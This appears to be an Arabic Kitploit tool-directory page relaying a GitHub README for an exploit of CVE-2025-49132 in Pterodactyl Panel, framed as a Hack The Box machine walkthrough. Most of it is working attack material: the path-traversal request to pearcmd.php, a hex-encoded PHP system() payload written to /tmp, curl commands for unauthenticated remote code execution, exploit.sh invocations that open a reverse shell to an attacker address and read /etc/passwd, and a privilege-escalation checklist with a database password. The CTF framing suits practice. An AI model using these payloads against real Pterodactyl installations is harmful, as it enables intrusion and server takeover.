Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49132_HTB_SEASON10 — استغلال لثغرة CVE-2025-49132 تستهدف لوحة Pterodactyl، يجمع بين اجتياز المسار (path traversal) وحقن أوامر PEAR لتنفيذ تعليمات برمجية عن بعد دون مصادقة. يتضمن نصوصًا بلغة bash وPython لتنفيذ الأوامر، وقذائف عكسية، وإرشادات لتصعيد الصلاحيات. | Kitploit
أدوات/GitHubGitHub/nik123-py/cve-2025-49132_htb_season10
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubnik123-py/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال لثغرة CVE-2025-49132 تستهدف لوحة Pterodactyl، يجمع بين اجتياز المسار (path traversal) وحقن أوامر PEAR لتنفيذ تعليمات برمجية عن بعد دون مصادقة. يتضمن نصوصًا بلغة bash وPython لتنفيذ الأوامر، وقذائف عكسية، وإرشادات لتصعيد الصلاحيات.

عرض المستودع
11منذ 6 أشهرلم تتم المراجعة بعد

CVE-2025-49132 - استغلال تنفيذ الأوامر عن بعد في لوحة Pterodactyl

موسم HTB 10 - شرح آلة Pterodactyl

نظرة عامة

الهدف: آلة Pterodactyl HTB (صعوبة متوسطة)
CVE: CVE-2025-49132
الخطورة: حرجة (CVSS 9.8)
نوع الهجوم: تنفيذ أوامر عن بعد بدون مصادقة
المتأثر: لوحة Pterodactyl إصدار < v1.11.11

تجمع هذه السلسلة exploitation بين:

  1. اجتياز المسار في نظام الترجمة المحلية
  2. حقن أوامر PEAR عبر pearcmd.php
  3. تنفيذ كود PHP من خلال كتابة ملف + تضمينه

الخلل

يتيح نقطة النهاية /locales/locale.json في لوحة Pterodactyl اجتياز المسار عبر المعامل locale:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

يمكن ربط هذا مع pearcmd.php الخاص بـ PEAR من أجل:

  1. كتابة ملفات PHP عشوائية إلى /tmp
  2. تنفيذها عبر طلب آخر

لماذا يعمل

PEAR (مستودع ملحقات وتطبيقات PHP) يحتوي على أداة CLI (pearcmd.php) تقوم بـ:

  • قبول الأوامر عبر معاملات URL (مخصصة لـ CLI فقط)
  • تحتوي على أمر config-create يكتب الملفات
  • لا تحتوي على أي مصادقة عند استدعائها عبر الويب

سلسلة الاستغلال:

root@kitploit:~
اجتياز المسار ← تحميل pearcmd.php ← حقن PHP عبر config-create ← تنفيذ PHP خبيث

خدعة Hex2bin()

يتم ترميز الأوامر بالنظام الست عشري باستخدام hex2bin() لتجاوز:

  • مشاكل ترميز URL
  • مرشحات الأحرف الخاصة
  • مشاكل تحليل Nginx/PHP

مثال:

root@kitploit:~
الأمر: whoami
الست عشري: 77686f616d69
الحمولة: <?=system(hex2bin('77686f616d69'))?>

تنفيذ الأوامر عن بعد

الطريقة 1: استخدام exploit.sh المقدم

root@kitploit:~
chmod +x exploit.sh

# الحصول على علم المستخدم
./exploit.sh flag

# تنفيذ الأوامر
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# قذيفة عكسية
nc -lvnp 4444  # على جهاز المهاجم
./exploit.sh shell 10.10.14.21 4444

الطريقة 2: استغلال يدوي

root@kitploit:~
# الخطوة 1: كتابة قذيفة PHP (محولة إلى ست عشري "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"

# الخطوة 2: التنفيذ
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"

الطريقة 3: سكربت Python

root@kitploit:~
أضفت exploit.py
**تثبيت requests**

🛠️ الأدوات المقدمة

1. exploit.sh (موصى به)

استغلال bash كامل الميزات

root@kitploit:~
./exploit.sh cmd "whoami"           # تنفيذ أمر واحد
./exploit.sh shell 10.10.14.21 4444 # قذيفة عكسية
./exploit.sh flag                   # العثور على علم المستخدم

الميزات:

  • ترميز Hex2bin() للموثوقية
  • ترشيح الإخراج بناءً على Python
  • طرق قذائف متعددة (bash TCP + mkfifo)
  • إخراج نظيف ومنسق

2. CVE-2025-49132_DETAILED.txt

توثيق تقني شامل

يحتوي على:

  • تحليل عميق للثغرة
  • شرح لبنية PEAR
  • تحليل خطوة بخطوة للاستغلال
  • دليل استكشاف الأخطاء
  • طرق الكشف (مؤشرات الاختراق)
  • استراتيجيات التخفيف

بداية سريعة

root@kitploit:~
# 1. أضف إلى /etc/hosts
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts

# 2. تحميل الاستغلال
wget https://your-repo/exploit.sh
chmod +x exploit.sh

# 3. الحصول على قذيفة
nc -lvnp 4444  # الطرفية 1
./exploit.sh shell 10.10.14.21 4444  # الطرفية 2

# 4. الحصول على علم المستخدم
cat /home/phileasfogg3/user.txt

تصعيد الامتيازات

الاستكشاف

root@kitploit:~
# التحقق من الخدمات الجارية
ss -tlnp

# تم العثور على:
# 127.0.0.1:3306 - MySQL (جذر)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (جذر)
# 127.0.0.1:25   - Postfix

# التحقق من sudo
sudo -l
# (يحتاج على الأرجح كلمة مرور)

# ملفات SUID
find / -perm -4000 2>/dev/null

# مهام cron
cat /etc/crontab
ls -la /etc/cron.*

ناقلات تصعيد الامتيازات الشائعة

  1. MySQL ببيانات اعتماد معروفة
root@kitploit:~
mysql -u pterodactyl -pPteraPanel
# التحقق من حقن UDF، صلاحيات كتابة الملفات
  1. PHP-FPM يعمل كجذر
root@kitploit:~
# التحقق من استغلال FPM (CVE-2019-11043 أو إساءة استخدام الإعدادات)
  1. استغلال Redis
root@kitploit:~
# التحقق من تجاوز المصادقة، تنفيذ أوامر عبر cron
redis-cli -h 127.0.0.1
  1. التحقق من السكريبتات القابلة للكتابة في cron
root@kitploit:~
find /etc/cron* -writable 2>/dev/null
  1. استغلالات النواة (الملاذ الأخير)
root@kitploit:~
uname -a
# التحقق من DirtyCow وغيرها

المراجع

CVE والاستغلالات

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

الموارد التقنية

  • وثائق لوحة Pterodactyl
  • توثيق PEAR
  • اجتياز المسار من OWASP

تنزيل الأداة